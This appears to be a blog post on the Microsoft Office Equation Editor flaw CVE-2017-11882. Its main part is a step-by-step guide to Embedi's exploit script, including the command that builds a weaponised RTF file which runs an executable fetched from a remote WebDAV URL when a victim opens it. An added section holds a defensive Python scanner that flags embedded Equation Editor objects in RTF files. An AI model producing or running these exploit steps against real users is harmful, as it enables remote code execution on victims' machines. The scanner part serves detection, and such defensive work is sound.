CVE-2017-11882 POC, Exploit Released – Skeleton in the Closet
A 17-year-old vulnerability in Microsoft Word was recently disclosed and is tracked as CVE-2017-11882. It affects the major versions of Microsoft Office: Microsoft Office 2007 SP 3, Microsoft Office 2010 SP 2, Microsoft Office 2013 SP 1, and Microsoft Office 2016. The vulnerability allows attackers to execute code remotely with the privileges of the current user because of a flaw in how objects are handled in memory; it is otherwise known as the “Microsoft Office Memory Corruption Vulnerability”. You can download the white paper by clicking the link below.
Download White Paper
An exploit for this vulnerability has been released by ‘Embedi’ and is available for download on their GitHub page.
POC
https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
Instructions
Step 1
Start a terminal and perform an update and an upgrade by executing the commands
sudo apt update
sudo apt upgrade
Step 2
The code is available for download; click the link below to download it.
Download
Step 3
Go inside the directory and you will find a file named “webdav_exec_CVE-2017-11882.py”. This is the file that we will be using to create the exploit RTF file. Now you can execute the command
python webdav_exec_CVE-2017-11882.py -h
for help.
To create the payload, execute the command
python webdav_exec_CVE-2017-11882.py -u <URL> -e <executable_file> -o <output_name>
When this file is opened on the victim's machine, the executable file will start to run.
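For triage on the receiving side, the following added example (not part of the original post or of Embedi's repository) scans an RTF file for embedded OLE objects and flags those that invoke the Equation Editor. It assumes, beyond what the page states, that the vulnerable component is the legacy Equation Editor OLE server with ProgID "Equation.3"; the function names and sample documents are constructed for illustration.

```python
import re
import struct

# Assumption (not stated on the page): the vulnerable component is the legacy
# Equation Editor OLE server, whose embedded objects use the ProgID "Equation.3".
EQUATION_PROGID = b"equation.3"

def objdata_blobs(rtf: bytes):
    """Yield the decoded bytes of each \\objdata group (triage, not a full RTF parser)."""
    for m in re.finditer(rb"\\objdata", rtf):
        end = rtf.find(b"}", m.end())
        body = rtf[m.end():end if end != -1 else len(rtf)]
        body = re.sub(rb"\\[a-z]+-?\d* ?", b"", body)   # drop stray control words
        hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", body)  # drop whitespace and line breaks
        yield bytes.fromhex(hexchars[:len(hexchars) // 2 * 2].decode("ascii"))

def ole1_class_name(blob: bytes):
    """Return the class name from an OLE 1.0 object header, or None if malformed."""
    if len(blob) < 12:
        return None
    _version, _format_id, name_len = struct.unpack_from("<III", blob, 0)
    if name_len == 0 or 12 + name_len > len(blob):
        return None
    return blob[12:12 + name_len].rstrip(b"\x00")

def scan_rtf(rtf: bytes) -> dict:
    """Report embedded objects and flag any that invoke the Equation Editor."""
    objects = []
    for blob in objdata_blobs(rtf):
        name = ole1_class_name(blob)
        hit = EQUATION_PROGID in blob.lower()
        objects.append({"class_name": name, "size": len(blob), "equation_object": hit})
    return {
        "auto_update": b"\\objupdate" in rtf,  # object is updated when the document is displayed
        "objects": objects,
        "suspicious": any(o["equation_object"] for o in objects),
    }

# Constructed sample: an OLE 1.0 header naming Equation.3 followed by zero padding.
_HEADER = struct.pack("<III", 0x0501, 2, 11) + b"Equation.3\x00" + bytes(8)
SAMPLE_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
              b"{\\*\\objdata " + _HEADER.hex().encode() + b"}}}")
CLEAN_RTF = b"{\\rtf1 Hello, world.}"

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_RTF))
    print(scan_rtf(CLEAN_RTF))
```

A hit only shows that the document embeds an equation object, so flagged files should go to sandbox analysis rather than being treated as confirmed malicious.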
Source: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
https://github.com/embedi/CVE-2017-11882